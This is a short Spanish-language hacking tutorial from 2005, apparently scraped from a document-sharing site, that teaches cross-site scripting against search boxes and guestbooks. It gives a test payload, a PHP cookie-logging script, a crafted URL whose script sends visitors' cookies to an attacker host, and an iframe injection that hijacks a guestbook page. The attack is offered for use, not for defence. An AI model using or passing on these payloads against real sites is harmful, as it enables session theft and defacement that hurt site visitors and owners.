Вы находитесь на странице: 1из 2

############################################################################

\* Http://WwW.YaNKeeZoft.Org */

Cross Site Scripting Atack

############################################################################
\* Escrito por: YaNKee [ elyankee@gmail.com ]
############################################################################
Hay dos formas para poder usar este ataque: a un buscador, o a otro tipo de form
ulario (un libro de visitas o un tag por ejemplo)
Buscador:
Lo primero encontrar un buscador, para saber si es vulnerable introducir el sigu
iente cdigo:
<script>alert(hola)</script>
Si es vulnerables, saldr un ventana que pondr hola, en caso contrario no saldr nada
.
Si vulnerable, el siguiente paso es ver el name del buscador y del botn de bsqued
a.
<input type="text" name="palabra"> que ser el formulario.
<input type="submit" name="buscar" value="Buscar"> que ser el boton.
La caja de texto donde ponemos lo que vamos a buscar se llama palabra y el botn b
uscar.
Ahora lo que hay que hacer es almacenar las cookies en un archivo d texto para e
llo creamos un archivo PHP que contenga el siguiente cdigo.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=cookies.php-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Cdigo:
##################################
# <?
#
# $cookie = $_GET['cookie'];
#
# $fff = fopen("cookie.txt","a");#
# fwrite($fff, "$cookie \n");
#
# fclose($fff);
#
# ?>
#
##################################
lo que hace este cdigo es guardar la cookie en un archivo txt que se llama cookie
.txt.
Una vez hecho este paso solo tenemos que crear URL que ejecute a cookie.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=-=-=-=-=-= | * Cdigo: * | =-=-=-=-=-=


http://www.vulnerable.com/buscador.php?palabra=<script>window.location=

'http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
=-=-=-=-=-= | * Formulario: * | =-=-=-=-=-=
Buscamos un libro de visitas o un tag y probamos que sea vulnerable:
#############################
<script>alert(hola)</script>
#############################
Si es vulnerable, creamos un archivo PHP que se llama owned.php (por ejemplo) y
introducimos el siguiente cdigo (ademas de lo que se quiera poner en el nuevo in
dex) en fichero owned:
##################################
<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!-if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>
##################################
Este codigo hace que se el IFRAME la pagina principal. Despues en la caja de tex
to del formularios vulnerable ponemos lo suiguiente:
<iframe src=http://www.atacante.org/owned.php>
Con esto hacemos que cuando alguien linkea a el formulario automaticamenta carga
nuestro owned.php y lo pone como pagina principal.
######################################################################
Copyright 2005 YaNKee Zoft - No modificar sin permiso de su autor
Texto de libre Distribucion No Cambiar los datos del Autor
########################################################################

Вам также может понравиться